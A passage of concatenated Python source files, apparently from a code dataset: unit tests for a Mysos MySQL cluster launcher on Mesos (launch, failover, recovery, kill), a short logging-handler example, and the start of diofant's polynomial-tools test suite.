self._launchers.extend(launchers)
resources = create_resources(
cpus=DEFAULT_TASK_CPUS * 3,
mem=DEFAULT_TASK_MEM * 3,
disk=DEFAULT_TASK_DISK * 3,
ports=set([10000, 10001, 10002]))
self._offer.resources.extend(resources)
# Three nodes in total across two clusters.
# Simulate the scheduler.
for i in range(3):
for launcher in launchers:
task_id, remaining = launcher.launch(self._offer)
if task_id:
# Update the offer so other launchers will use its remaining resources.
del self._offer.resources[:]
self._offer.resources.extend(remaining)
break
tasks = self._driver.method_calls["launchTasks"]
assert len(tasks) == 3
def test_invalid_status_update(self):
"""Launcher raises an exception when an invalid status is received."""
self._cluster.num_nodes = 1
launcher = MySQLClusterLauncher(
self._driver,
self._cluster,
self._state_provider,
self._zk_url,
self._zk_client,
self._framework_user,
"./executor.pex",
"cmd.sh",
Amount(5, Time.SECONDS),
"/etc/mysos/admin_keyfile.yml",
self._scheduler_key)
self._launchers.append(launcher)
resources = create_resources(
cpus=DEFAULT_TASK_CPUS,
mem=DEFAULT_TASK_MEM,
disk=DEFAULT_TASK_DISK,
ports=set([10000]))
self._offer.resources.extend(resources)
task_id, _ = launcher.launch(self._offer)
assert task_id == "mysos-cluster0-0"
tasks = self._driver.method_calls["launchTasks"]
assert len(tasks) == self._cluster.num_nodes
status = mesos_pb2.TaskStatus()
status.task_id.value = task_id
status.state = mesos_pb2.TASK_RUNNING # Valid state.
launcher.status_update(status)
status.state = mesos_pb2.TASK_FINISHED # An invalid state.
with pytest.raises(MySQLClusterLauncher.Error):
launcher.status_update(status)
def test_terminal_status_update(self):
"""Launcher reacts to terminated task by launching a new one."""
self._cluster.num_nodes = 1
launcher = MySQLClusterLauncher(
self._driver,
self._cluster,
self._state_provider,
self._zk_url,
self._zk_client,
self._framework_user,
"./executor.pex",
"cmd.sh",
Amount(1, Time.SECONDS),
"/etc/mysos/admin_keyfile.yml",
self._scheduler_key)
self._launchers.append(launcher)
resources = create_resources(
cpus=DEFAULT_TASK_CPUS,
mem=DEFAULT_TASK_MEM,
disk=DEFAULT_TASK_DISK,
ports=set([10000]))
self._offer.resources.extend(resources)
task_id, _ = launcher.launch(self._offer)
assert task_id == "mysos-cluster0-0"
launched = self._driver.method_calls["launchTasks"]
assert len(launched) == self._cluster.num_nodes
status = mesos_pb2.TaskStatus()
status.task_id.value = task_id
status.state = mesos_pb2.TASK_RUNNING
launcher.status_update(status)
assert len(launcher._cluster.running_tasks) == 1
status.state = mesos_pb2.TASK_LOST
launcher.status_update(status)
assert len(launcher._cluster.running_tasks) == 0
task_id, _ = launcher.launch(self._offer)
assert task_id == "mysos-cluster0-1"
launched = self._driver.method_calls["launchTasks"]
# One task is relaunched to make up for the lost one.
assert len(launched) == self._cluster.num_nodes + 1
def test_master_failover(self):
for i in range(self._cluster.num_nodes):
task_id, remaining = self._launcher.launch(self._offer)
del self._offer.resources[:]
self._offer.resources.extend(remaining)
assert task_id == "mysos-cluster0-%s" % i
tasks = self._driver.method_calls["launchTasks"]
assert len(tasks) == self._cluster.num_nodes
# All 3 nodes have successfully started.
status = mesos_pb2.TaskStatus()
status.state = mesos_pb2.TASK_RUNNING
status.slave_id.value = self._offer.slave_id.value
for i in range(self._cluster.num_nodes):
status.task_id.value = "mysos-cluster0-%s" % i
self._launcher.status_update(status)
# No log positions queries are sent for the first epoch.
assert "sendFrameworkMessage" not in self._driver.method_calls
# Wait for the election to complete.
deadline(
lambda: wait_for_master(
get_cluster_path(self._zk_url, self._cluster.name),
self._zk_client),
Amount(5, Time.SECONDS))
# The first slave is elected.
assert "/mysos/test/cluster0/master/member_0000000000" in self._storage.paths
# Now fail the master task.
status.task_id.value = "mysos-cluster0-0"
status.state = mesos_pb2.TASK_FAILED
self._launcher.status_update(status)
assert len(self._launcher._cluster.running_tasks) == 2
# Log positions queries are sent.
self._launcher._elector._elect()
assert len(self._driver.method_calls["sendFrameworkMessage"]) >= 2
for i in range(1, self._cluster.num_nodes):
self._launcher.framework_message(
"mysos-cluster0-%s" % i,
self._offer.slave_id.value,
json.dumps(dict(epoch=1, position=str(i))))
# Wait for the election to complete.
deadline(
lambda: wait_for_master(
get_cluster_path(self._zk_url, self._cluster.name),
self._zk_client),
Amount(5, Time.SECONDS))
# The slave with the highest position is elected.
assert "/mysos/test/cluster0/master/member_0000000002" in self._storage.paths
assert len(self._launcher._cluster.running_tasks) == 2
# When a new offer comes in, a new task is launched.
del self._offer.resources[:]
resources = create_resources(
cpus=DEFAULT_TASK_CPUS,
mem=DEFAULT_TASK_MEM,
disk=DEFAULT_TASK_DISK,
ports=set([10000]))
self._offer.resources.extend(resources)
task_id, _ = self._launcher.launch(self._offer)
assert task_id == "mysos-cluster0-3"
launched = self._driver.method_calls["launchTasks"]
# One task is relaunched to make up for the failed one.
assert len(launched) == self._cluster.num_nodes + 1
def test_launcher_recovery_after_election_completed(self):
# 1. Launch a cluster on the running launcher.
for i in range(self._cluster.num_nodes):
task_id, remaining = self._launcher.launch(self._offer)
del self._offer.resources[:]
self._offer.resources.extend(remaining)
assert task_id == "mysos-cluster0-%s" % i
tasks = self._driver.method_calls["launchTasks"]
assert len(tasks) == self._cluster.num_nodes
# No new tasks are launched.
assert self._launcher.launch(self._offer)[0] is None
assert len(self._driver.method_calls["launchTasks"]) == self._cluster.num_nodes
# All 3 nodes have successfully started.
status = mesos_pb2.TaskStatus()
status.state = mesos_pb2.TASK_RUNNING
status.slave_id.value = self._offer.slave_id.value
for i in range(self._cluster.num_nodes):
status.task_id.value = "mysos-cluster0-%s" % i
self._launcher.status_update(status)
deadline(
lambda: wait_for_master(
get_cluster_path(self._zk_url, self._cluster.name),
self._zk_client),
Amount(5, Time.SECONDS))
# The first slave is elected.
assert "/mysos/test/cluster0/master/member_0000000000" in self._storage.paths
# Two slaves.
assert len([x for x in self._storage.paths.keys() if x.startswith(
"/mysos/test/cluster0/slaves/member_")]) == 2
# 2. Recover the launcher.
self._cluster = self._state_provider.load_cluster_state(self._cluster.name)
self._launcher = MySQLClusterLauncher(
self._driver,
self._cluster,
self._state_provider,
self._zk_url,
self._zk_client,
self._framework_user,
"./executor.pex",
"cmd.sh",
Amount(5, Time.SECONDS),
"/etc/mysos/admin_keyfile.yml",
self._scheduler_key,
query_interval=Amount(150, Time.MILLISECONDS))
# Now fail the master task.
status.task_id.value = "mysos-cluster0-0"
status.state = mesos_pb2.TASK_FAILED
self._launcher.status_update(status)
for i in range(1, self._cluster.num_nodes):
self._launcher.framework_message(
"mysos-cluster0-%s" % i,
self._offer.slave_id.value,
json.dumps(dict(epoch=1, position=str(i))))
deadline(
lambda: wait_for_master(
get_cluster_path(self._zk_url, self._cluster.name),
self._zk_client),
Amount(5, Time.SECONDS))
# The second slave has the larger position and is elected.
assert "/mysos/test/cluster0/master/member_0000000002" in self._storage.paths
def test_launcher_recovery_before_election_completed(self):
# 1. Launch a cluster on the running launcher.
for i in range(self._cluster.num_nodes):
task_id, remaining = self._launcher.launch(self._offer)
del self._offer.resources[:]
self._offer.resources.extend(remaining)
assert task_id == "mysos-cluster0-%s" % i
tasks = self._driver.method_calls["launchTasks"]
assert len(tasks) == self._cluster.num_nodes
# No new tasks are launched.
assert self._launcher.launch(self._offer)[0] is None
assert len(self._driver.method_calls["launchTasks"]) == self._cluster.num_nodes
# All 3 nodes have successfully started.
status = mesos_pb2.TaskStatus()
status.state = mesos_pb2.TASK_RUNNING
status.slave_id.value = self._offer.slave_id.value
for i in range(self._cluster.num_nodes):
status.task_id.value = "mysos-cluster0-%s" % i
self._launcher.status_update(status)
deadline(
lambda: wait_for_master(
get_cluster_path(self._zk_url, self._cluster.name),
self._zk_client),
Amount(5, Time.SECONDS))
# The first slave is elected.
assert "/mysos/test/cluster0/master/member_0000000000" in self._storage.paths
# Two slaves.
assert len([x for x in self._storage.paths.keys() if x.startswith(
"/mysos/test/cluster0/slaves/member_")]) == 2
# Now fail the master task which leads to re-election.
status.task_id.value = "mysos-cluster0-0"
status.state = mesos_pb2.TASK_FAILED
self._launcher.status_update(status)
# 2. Recover the launcher.
self._cluster = self._state_provider.load_cluster_state(self._cluster.name)
self._launcher = MySQLClusterLauncher(
self._driver,
self._cluster,
self._state_provider,
self._zk_url,
self._zk_client,
self._framework_user,
"./executor.pex",
"cmd.sh",
Amount(5, Time.SECONDS),
"/etc/mysos/admin_keyfile.yml",
self._scheduler_key,
query_interval=Amount(150, Time.MILLISECONDS))
for i in range(1, self._cluster.num_nodes):
self._launcher.framework_message(
"mysos-cluster0-%s" % i,
self._offer.slave_id.value,
json.dumps(dict(epoch=2, position=str(i))))
deadline(
lambda: wait_for_master(
get_cluster_path(self._zk_url, self._cluster.name),
self._zk_client),
Amount(5, Time.SECONDS))
# The second slave has the larger position and is elected.
assert "/mysos/test/cluster0/master/member_0000000002" in self._storage.paths
def test_launcher_kill(self):
for i in range(self._cluster.num_nodes):
task_id, remaining = self._launcher.launch(self._offer)
del self._offer.resources[:]
self._offer.resources.extend(remaining)
assert task_id == "mysos-cluster0-%s" % i
tasks = self._driver.method_calls["launchTasks"]
assert len(tasks) == self._cluster.num_nodes
# No new tasks are launched.
assert self._launcher.launch(self._offer)[0] is None
assert len(self._driver.method_calls["launchTasks"]) == self._cluster.num_nodes
# All 3 nodes have successfully started.
status = mesos_pb2.TaskStatus()
status.state = mesos_pb2.TASK_RUNNING # Valid state.
status.slave_id.value = self._offer.slave_id.value
for i in range(self._cluster.num_nodes):
status.task_id.value = "mysos-cluster0-%s" % i
self._launcher.status_update(status)
deadline(
lambda: wait_for_master(
get_cluster_path(self._zk_url, self._cluster.name),
self._zk_client),
Amount(5, Time.SECONDS))
# The first slave is elected.
assert "/mysos/test/cluster0/master/member_0000000000" in self._storage.paths
# Two slaves.
assert len([x for x in self._storage.paths.keys() if x.startswith(
"/mysos/test/cluster0/slaves/member_")]) == 2
# Kill the cluster.
with pytest.raises(MySQLClusterLauncher.PermissionError):
self._launcher.kill("wrong_password")
# Correct password.
self._launcher.kill(self._password_box.decrypt(self._cluster.encrypted_password))
# All 3 nodes are successfully killed.
status = mesos_pb2.TaskStatus()
status.state = mesos_pb2.TASK_KILLED
status.slave_id.value = self._offer.slave_id.value
for i in range(self._cluster.num_nodes):
status.task_id.value = "mysos-cluster0-%s" % i
self._launcher.status_update(status)
assert "/mysos/test/cluster0" not in self._storage.paths # ServerSets removed.
assert not self._state_provider.load_cluster_state("cluster0") # State removed.
def test_launcher_recovery_corrupted_password(self):
# 1. Launch a single instance for a cluster on the running launcher.
task_id, remaining = self._launcher.launch(self._offer)
del self._offer.resources[:]
self._offer.resources.extend(remaining)
assert task_id == "mysos-cluster0-0"
# The task has successfully started.
status = mesos_pb2.TaskStatus()
status.state = mesos_pb2.TASK_RUNNING
status.slave_id.value = self._offer.slave_id.value
status.task_id.value = "mysos-cluster0-0"
self._launcher.status_update(status)
# 2. Recover the launcher.
self._cluster = self._state_provider.load_cluster_state(self._cluster.name)
self._cluster.encrypted_password = "corrupted_password"
# The corrupted password causes the launcher constructor to fail.
with pytest.raises(ValueError):
self._launcher = MySQLClusterLauncher(
self._driver,
self._cluster,
self._state_provider,
self._zk_url,
self._zk_client,
self._framework_user,
"./executor.pex",
"cmd.sh",
Amount(5, Time.SECONDS),
"/etc/mysos/admin_keyfile.yml",
self._scheduler_key,
query_interval=Amount(150, Time.MILLISECONDS))
|
py | b40b24719eae52ccb90172db7e16fb621b460f39 | import logging
logger = logging.getLogger('logger_1')
logger.warning('warning')
stream_handler = logging.StreamHandler()
formatter = logging.Formatter('%(asctime)s %(name)s %(levelname)s:%(message)s')
stream_handler.setFormatter(formatter)
logger.addHandler(stream_handler)
logger.warning('warning again')
root = logging.getLogger()
stream_handler = logging.StreamHandler()
formatter = logging.Formatter('%(asctime)s %(name)s %(levelname)s:%(message)s')
stream_handler.setFormatter(formatter)
root.addHandler(stream_handler)
root.warning('warning')
|
py | b40b251565dc56624c3ab37ca8445ba1dd8ea394 | """Tests for user-friendly public interface to polynomial functions."""
import functools
import math
import pytest
from diofant import (CC, EX, FF, LC, LM, LT, QQ, RR, ZZ, CoercionFailed,
ComputationFailed, Derivative, DomainError, E, Eq,
ExactQuotientFailed, Expr, FlagError, Float,
GeneratorsError, GeneratorsNeeded, GroebnerBasis, I,
Integer, Integral, MatrixSymbol, Mul,
MultivariatePolynomialError, O, OptionError, Piecewise,
PolificationFailed, Poly, PolynomialError, PurePoly,
Rational, RealField, RootOf, Sum, Symbol, Tuple,
UnificationFailed, cancel, cofactors, compose, content,
cos, count_roots, decompose, degree, diff, discriminant,
div, exp, expand, exquo, factor, factor_list, false, gcd,
gcdex, grevlex, grlex, groebner, half_gcdex, im, invert,
lcm, lex, log, monic, nroots, oo, parallel_poly_from_expr,
pi, primitive, quo, re, real_roots, reduced, rem,
resultant, sin, sqf, sqf_list, sqf_norm, sqf_part, sqrt,
subresultants, symbols, sympify, tan, tanh, terms_gcd,
true, trunc)
from diofant.abc import a, b, c, d, p, q, t, w, x, y, z
from diofant.core.mul import _keep_coeff
from diofant.polys.polytools import to_rational_coeffs
__all__ = ()
def _epsilon_eq(a, b):
for x, y in zip(a, b):
if abs(x - y) > 1e-10:
return False
return True
def test_Poly_from_dict():
K = FF(3)
assert Poly.from_dict({0: 1, 1: 2}, gens=x,
domain=K).rep.all_coeffs() == [K(1), K(2)]
assert Poly.from_dict({0: 1, 1: 5}, gens=x,
domain=K).rep.all_coeffs() == [K(1), K(2)]
assert Poly.from_dict({(0,): 1, (1,): 2}, gens=x,
domain=K).rep.all_coeffs() == [K(1), K(2)]
assert Poly.from_dict({(0,): 1, (1,): 5}, gens=x,
domain=K).rep.all_coeffs() == [K(1), K(2)]
assert dict(Poly.from_dict({(0, 0): 1, (1, 1): 2}, gens=(x, y),
domain=K).rep) == {(0, 0): K(1), (1, 1): K(2)}
assert Poly.from_dict({0: 1, 1: 2}, gens=x).rep.all_coeffs() == [ZZ(1), ZZ(2)]
assert Poly.from_dict({0: 1, 1: 2}, gens=x,
field=True).rep.all_coeffs() == [QQ(1), QQ(2)]
assert Poly.from_dict({0: 1, 1: 2}, gens=x,
domain=ZZ).rep.all_coeffs() == [ZZ(1), ZZ(2)]
assert Poly.from_dict({0: 1, 1: 2}, gens=x,
domain=QQ).rep.all_coeffs() == [QQ(1), QQ(2)]
assert Poly.from_dict({(0,): 1, (1,): 2},
gens=x).rep.all_coeffs() == [ZZ(1), ZZ(2)]
assert Poly.from_dict({(0,): 1, (1,): 2}, gens=x,
field=True).rep.all_coeffs() == [QQ(1), QQ(2)]
assert Poly.from_dict({(0,): 1, (1,): 2}, gens=x,
domain=ZZ).rep.all_coeffs() == [ZZ(1), ZZ(2)]
assert Poly.from_dict({(0,): 1, (1,): 2}, gens=x,
domain=QQ).rep.all_coeffs() == [QQ(1), QQ(2)]
assert Poly.from_dict({(1,): sin(y)}, gens=x, composite=False) == \
(sin(y)*x).as_poly(x, domain=EX)
assert Poly.from_dict({(1,): y}, gens=x, composite=False) == \
(y*x).as_poly(x, domain=EX)
assert Poly.from_dict({(1, 1): 1}, gens=(x, y), composite=False) == \
(x*y).as_poly(x, y, domain=ZZ)
assert Poly.from_dict({(1, 0): y}, gens=(x, z), composite=False) == \
(y*x).as_poly(x, z, domain=EX)
pytest.raises(GeneratorsError,
lambda: Poly.from_dict({(1,): x, (0,): 1}, gens=(x,)))
def test_Poly_from_list():
K = FF(3)
assert Poly.from_list([2, 1], gens=x, domain=K).rep.all_coeffs() == [K(2), K(1)]
assert Poly.from_list([5, 1], gens=x, domain=K).rep.all_coeffs() == [K(2), K(1)]
assert Poly.from_list([2, 1], gens=x).rep.all_coeffs() == [ZZ(2), ZZ(1)]
assert Poly.from_list([2, 1], gens=x, field=True).rep.all_coeffs() == [QQ(2), QQ(1)]
assert Poly.from_list([2, 1], gens=x, domain=ZZ).rep.all_coeffs() == [ZZ(2), ZZ(1)]
assert Poly.from_list([2, 1], gens=x, domain=QQ).rep.all_coeffs() == [QQ(2), QQ(1)]
assert Poly.from_list([0, 1.0], gens=x).rep.all_coeffs() == [RR(0), RR(1.0)]
assert Poly.from_list([1.0, 0], gens=x).rep.all_coeffs() == [RR(1.0)]
pytest.raises(MultivariatePolynomialError, lambda: Poly.from_list([[]], gens=(x, y)))
pytest.raises(GeneratorsError, lambda: Poly.from_list([x, 1], gens=(x,)))
def test_Poly_from_poly():
f = (x + 7).as_poly(x, domain=ZZ)
g = (x + 2).as_poly(x, modulus=3)
h = (x + y).as_poly(x, y, domain=ZZ)
K = FF(3)
assert Poly.from_poly(f) == f
assert Poly.from_poly(f, domain=K).rep.all_coeffs() == [K(1), K(1)]
assert Poly.from_poly(f, domain=ZZ).rep.all_coeffs() == [ZZ(7), ZZ(1)]
assert Poly.from_poly(f, domain=QQ).rep.all_coeffs() == [QQ(7), QQ(1)]
assert Poly.from_poly(f, gens=x) == f
assert Poly.from_poly(f, gens=x, domain=K).rep.all_coeffs() == [K(1), K(1)]
assert Poly.from_poly(f, gens=x, domain=ZZ).rep.all_coeffs() == [ZZ(7), ZZ(1)]
assert Poly.from_poly(f, gens=x, domain=QQ).rep.all_coeffs() == [QQ(7), QQ(1)]
assert Poly.from_poly(f, gens=y) == (x + 7).as_poly(y, domain=ZZ.inject(x))
pytest.raises(CoercionFailed, lambda: Poly.from_poly(f, gens=y, domain=K))
pytest.raises(CoercionFailed, lambda: Poly.from_poly(f, gens=y, domain=ZZ))
pytest.raises(CoercionFailed, lambda: Poly.from_poly(f, gens=y, domain=QQ))
assert Poly.from_poly(f, gens=(x, y)) == (x + 7).as_poly(x, y, domain=ZZ)
assert Poly.from_poly(
f, gens=(x, y), domain=ZZ) == (x + 7).as_poly(x, y, domain=ZZ)
assert Poly.from_poly(
f, gens=(x, y), domain=QQ) == (x + 7).as_poly(x, y, domain=QQ)
assert Poly.from_poly(
f, gens=(x, y), modulus=3) == (x + 7).as_poly(x, y, domain=FF(3))
K = FF(2)
assert Poly.from_poly(g) == g
assert Poly.from_poly(g, domain=ZZ).rep.all_coeffs() == [ZZ(2), ZZ(1)]
pytest.raises(CoercionFailed, lambda: Poly.from_poly(g, domain=QQ))
assert Poly.from_poly(g, domain=K).rep.all_coeffs() == [K(0), K(1)]
assert Poly.from_poly(g, gens=x) == g
assert Poly.from_poly(g, gens=x, domain=ZZ).rep.all_coeffs() == [ZZ(2), ZZ(1)]
pytest.raises(CoercionFailed, lambda: Poly.from_poly(g, gens=x, domain=QQ))
assert Poly.from_poly(g, gens=x, domain=K).rep.all_coeffs() == [K(0), K(1)]
K = FF(3)
assert Poly.from_poly(h) == h
assert dict(Poly.from_poly(h, domain=ZZ).rep) == {(1, 0): ZZ(1), (0, 1): ZZ(1)}
assert dict(Poly.from_poly(h, domain=QQ).rep) == {(1, 0): QQ(1), (0, 1): QQ(1)}
assert dict(Poly.from_poly(h, domain=K).rep) == {(1, 0): K(1), (0, 1): K(1)}
assert Poly.from_poly(h, gens=x) == (x + y).as_poly(x, domain=ZZ.inject(y))
pytest.raises(CoercionFailed, lambda: Poly.from_poly(h, gens=x, domain=ZZ))
assert Poly.from_poly(
h, gens=x, domain=ZZ.inject(y)) == (x + y).as_poly(x, domain=ZZ.inject(y))
pytest.raises(CoercionFailed, lambda: Poly.from_poly(h, gens=x, domain=QQ))
assert Poly.from_poly(
h, gens=x, domain=QQ.inject(y)) == (x + y).as_poly(x, domain=QQ.inject(y))
pytest.raises(CoercionFailed, lambda: Poly.from_poly(h, gens=x, modulus=3))
assert Poly.from_poly(h, gens=y) == (x + y).as_poly(y, domain=ZZ.inject(x))
pytest.raises(CoercionFailed, lambda: Poly.from_poly(h, gens=y, domain=ZZ))
assert Poly.from_poly(
h, gens=y, domain=ZZ.inject(x)) == (x + y).as_poly(y, domain=ZZ.inject(x))
pytest.raises(CoercionFailed, lambda: Poly.from_poly(h, gens=y, domain=QQ))
assert Poly.from_poly(
h, gens=y, domain=QQ.inject(x)) == (x + y).as_poly(y, domain=QQ.inject(x))
pytest.raises(CoercionFailed, lambda: Poly.from_poly(h, gens=y, modulus=3))
assert Poly.from_poly(h, gens=(x, y)) == h
assert dict(Poly.from_poly(h, gens=(x, y),
domain=ZZ).rep) == {(1, 0): ZZ(1), (0, 1): ZZ(1)}
assert dict(Poly.from_poly(h, gens=(x, y),
domain=QQ).rep) == {(1, 0): QQ(1), (0, 1): QQ(1)}
assert dict(Poly.from_poly(h, gens=(x, y),
domain=K).rep) == {(1, 0): K(1), (0, 1): K(1)}
assert dict(Poly.from_poly(h, gens=(y, x)).rep) == {(1, 0): ZZ(1), (0, 1): ZZ(1)}
assert dict(Poly.from_poly(h, gens=(y, x),
domain=ZZ).rep) == {(1, 0): ZZ(1), (0, 1): ZZ(1)}
assert dict(Poly.from_poly(h, gens=(y, x),
domain=QQ).rep) == {(1, 0): QQ(1), (0, 1): QQ(1)}
assert dict(Poly.from_poly(h, gens=(y, x),
domain=K).rep) == {(1, 0): K(1), (0, 1): K(1)}
assert dict(Poly.from_poly(h, gens=(x, y),
field=True).rep) == {(1, 0): QQ(1), (0, 1): QQ(1)}
assert dict(Poly.from_poly(h, gens=(x, y),
field=True).rep) == {(1, 0): QQ(1), (0, 1): QQ(1)}
def test_Poly_from_expr():
pytest.raises(GeneratorsNeeded, lambda: Poly.from_expr(Integer(0)))
pytest.raises(GeneratorsNeeded, lambda: Poly.from_expr(Integer(7)))
F3 = FF(3)
assert Poly.from_expr(x + 5, domain=F3).rep.all_coeffs() == [F3(2), F3(1)]
assert Poly.from_expr(y + 5, domain=F3).rep.all_coeffs() == [F3(2), F3(1)]
assert Poly.from_expr(x + 5, x, domain=F3).rep.all_coeffs() == [F3(2), F3(1)]
assert Poly.from_expr(y + 5, y, domain=F3).rep.all_coeffs() == [F3(2), F3(1)]
assert dict(Poly.from_expr(x + y, domain=F3).rep) == {(1, 0): F3(1), (0, 1): F3(1)}
assert dict(Poly.from_expr(x + y, x, y, domain=F3).rep) == {(1, 0): F3(1), (0, 1): F3(1)}
assert Poly.from_expr(x + 5).rep.all_coeffs() == [ZZ(5), ZZ(1)]
assert Poly.from_expr(y + 5).rep.all_coeffs() == [ZZ(5), ZZ(1)]
assert Poly.from_expr(x + 5, x).rep.all_coeffs() == [ZZ(5), ZZ(1)]
assert Poly.from_expr(y + 5, y).rep.all_coeffs() == [ZZ(5), ZZ(1)]
assert Poly.from_expr(x + 5, domain=ZZ).rep.all_coeffs() == [ZZ(5), ZZ(1)]
assert Poly.from_expr(y + 5, domain=ZZ).rep.all_coeffs() == [ZZ(5), ZZ(1)]
assert Poly.from_expr(x + 5, x, domain=ZZ).rep.all_coeffs() == [ZZ(5), ZZ(1)]
assert Poly.from_expr(y + 5, y, domain=ZZ).rep.all_coeffs() == [ZZ(5), ZZ(1)]
assert dict(Poly.from_expr(x + 5, x, y, domain=ZZ).rep) == {(1, 0): ZZ(1), (0, 0): ZZ(5)}
assert dict(Poly.from_expr(y + 5, x, y, domain=ZZ).rep) == {(0, 1): ZZ(1), (0, 0): ZZ(5)}
def test_Poly__new__():
pytest.raises(GeneratorsError, lambda: Poly(x + 1, x, x))
pytest.raises(GeneratorsError, lambda: Poly(x + y, x, y, domain=ZZ.inject(x)))
pytest.raises(GeneratorsError, lambda: Poly(x + y, x, y, domain=ZZ.inject(y)))
pytest.raises(OptionError, lambda: Poly(x + 2, x, modulus=3, domain=QQ))
pytest.raises(OptionError, lambda: Poly(x + 2, x, domain=ZZ, gaussian=True))
pytest.raises(OptionError, lambda: Poly(x + 2, x, modulus=3, gaussian=True))
pytest.raises(OptionError, lambda: Poly(x + 2, x, domain=ZZ, extension=[sqrt(3)]))
pytest.raises(OptionError, lambda: Poly(x + 2, x, modulus=3, extension=[sqrt(3)]))
pytest.raises(OptionError, lambda: Poly(x + 2, x, domain=ZZ, extension=True))
pytest.raises(OptionError, lambda: Poly(x + 2, x, modulus=3, extension=True))
pytest.raises(OptionError, lambda: Poly(x + 2, x, domain=ZZ, greedy=True))
pytest.raises(OptionError, lambda: Poly(x + 2, x, domain=QQ, field=True))
pytest.raises(OptionError, lambda: Poly(x + 2, x, domain=ZZ, greedy=False))
pytest.raises(OptionError, lambda: Poly(x + 2, x, domain=QQ, field=False))
f = (x + 1).as_poly(x, modulus=3, order='grlex')
assert f.get_modulus() == 3
assert f.rep.ring.order == grlex
f = (x + 1).as_poly(x, order='grlex')
assert f.rep.ring.order == grlex
pytest.raises(GeneratorsNeeded, lambda: Poly({1: 2, 0: 1}))
pytest.raises(GeneratorsNeeded, lambda: Poly([2, 1]))
pytest.raises(GeneratorsNeeded, lambda: Poly((2, 1)))
pytest.raises(GeneratorsNeeded, lambda: Poly(1))
f = a*x**2 + b*x + c
assert Poly({2: a, 1: b, 0: c}, x) == f
assert Poly(iter([c, b, a]), x) == f
assert Poly([c, b, a], x) == f
assert Poly((c, b, a), x) == f
f = Poly({}, x, y, z)
assert f.gens == (x, y, z) and f.as_expr() == 0
assert ((a*x + b*y).as_poly(x, y)).as_poly(x) == (a*x + b*y).as_poly(x)
assert (3*x**2 + 2*x + 1).as_poly(domain=ZZ).all_coeffs() == [1, 2, 3]
assert (3*x**2 + 2*x + 1).as_poly(domain=QQ).all_coeffs() == [1, 2, 3]
assert (3*x**2 + 2*x + 1).as_poly(domain=RR).all_coeffs() == [1.0, 2.0, 3.0]
pytest.raises(CoercionFailed, lambda: Poly(3*x**2/5 + 2*x/5 + 1, x, domain=ZZ))
assert (3*x**2/5 + 2*x/5 + 1).as_poly(domain=QQ).all_coeffs() == [1, Rational(2, 5), Rational(3, 5)]
assert _epsilon_eq(
(3*x**2/5 + 2*x/5 + 1).as_poly(domain=RR).all_coeffs(), [1.0, 0.4, 0.6])
assert (3.0*x**2 + 2.0*x + 1).as_poly(domain=ZZ).all_coeffs() == [1, 2, 3]
assert (3.0*x**2 + 2.0*x + 1).as_poly(domain=QQ).all_coeffs() == [1, 2, 3]
assert (3.0*x**2 + 2.0*x + 1).as_poly(domain=RR).all_coeffs() == [1.0, 2.0, 3.0]
pytest.raises(CoercionFailed, lambda: Poly(3.1*x**2 + 2.1*x + 1, x, domain=ZZ))
assert (3.1*x**2 + 2.1*x + 1).as_poly(domain=QQ).all_coeffs() == [1, Rational(21, 10), Rational(31, 10)]
assert (3.1*x**2 + 2.1*x + 1).as_poly(domain=RR).all_coeffs() == [1.0, 2.1, 3.1]
assert Poly({(2, 1): 1, (1, 2): 2, (1, 1): 3}, x, y) == \
(x**2*y + 2*x*y**2 + 3*x*y).as_poly(x, y)
assert (x**2 + 1).as_poly(extension=I).domain == QQ.algebraic_field(I)
f = 3*x**5 - x**4 + x**3 - x**2 + 65538
assert f.as_poly(x, modulus=65537) == \
(3*x**5 + 65536*x**4 + x**3 + 65536*x**2 + 1).as_poly(x, modulus=65537)
assert isinstance((x**2 + x + 1.0).as_poly().domain, RealField)
def test_Poly_new():
pytest.raises(PolynomialError, lambda: Poly.new([1], x))
pytest.raises(PolynomialError, lambda: Poly.new((x + 1).as_poly(x, y).rep, x))
def test_Poly__args():
assert (x**2 + 1).as_poly().args == (x**2 + 1, x)
def test_Poly_is_number():
assert Integer(1).as_poly(x).is_number
assert x.as_poly().is_number is False
def test_Poly__gens():
assert ((x - p)*(x - q)).as_poly(x).gens == (x,)
assert ((x - p)*(x - q)).as_poly(p).gens == (p,)
assert ((x - p)*(x - q)).as_poly(q).gens == (q,)
assert ((x - p)*(x - q)).as_poly(x, p).gens == (x, p)
assert ((x - p)*(x - q)).as_poly(x, q).gens == (x, q)
assert ((x - p)*(x - q)).as_poly(x, p, q).gens == (x, p, q)
assert ((x - p)*(x - q)).as_poly(p, x, q).gens == (p, x, q)
assert ((x - p)*(x - q)).as_poly(p, q, x).gens == (p, q, x)
assert ((x - p)*(x - q)).as_poly().gens == (x, p, q)
assert ((x - p)*(x - q)).as_poly(sort='x > p > q').gens == (x, p, q)
assert ((x - p)*(x - q)).as_poly(sort='p > x > q').gens == (p, x, q)
assert ((x - p)*(x - q)).as_poly(sort='p > q > x').gens == (p, q, x)
assert ((x - p)*(x - q)).as_poly(x, p, q, sort='p > q > x').gens == (x, p, q)
assert ((x - p)*(x - q)).as_poly(wrt='x').gens == (x, p, q)
assert ((x - p)*(x - q)).as_poly(wrt='p').gens == (p, x, q)
assert ((x - p)*(x - q)).as_poly(wrt='q').gens == (q, x, p)
assert ((x - p)*(x - q)).as_poly(wrt=x).gens == (x, p, q)
assert ((x - p)*(x - q)).as_poly(wrt=p).gens == (p, x, q)
assert ((x - p)*(x - q)).as_poly(wrt=q).gens == (q, x, p)
assert ((x - p)*(x - q)).as_poly(x, p, q, wrt='p').gens == (x, p, q)
assert ((x - p)*(x - q)).as_poly(wrt='p', sort='q > x').gens == (p, q, x)
assert ((x - p)*(x - q)).as_poly(wrt='q', sort='p > x').gens == (q, p, x)
def test_Poly_unify():
pytest.raises(UnificationFailed, lambda: x.as_poly().unify(y))
pytest.raises(UnificationFailed, lambda: PurePoly(x).unify(y))
pytest.raises(UnificationFailed, lambda: PurePoly(x).unify(Poly(x, x, y)))
assert x.as_poly(modulus=3).unify(y.as_poly(modulus=3)) == \
(x.as_poly(x, y, modulus=3), y.as_poly(x, y, modulus=3))
pytest.raises(NotImplementedError,
lambda: x.as_poly(modulus=3).unify(y.as_poly(modulus=5)))
assert y.as_poly(x, y).unify(x.as_poly(modulus=3)) == \
(y.as_poly(x, y, modulus=3), x.as_poly(x, y, modulus=3))
assert x.as_poly(modulus=3).unify(y.as_poly(x, y)) == \
(x.as_poly(x, y, modulus=3), y.as_poly(x, y, modulus=3))
assert (x + 1).as_poly().unify((x + 2).as_poly()) == \
((x + 1).as_poly(domain=ZZ), (x + 2).as_poly(domain=ZZ))
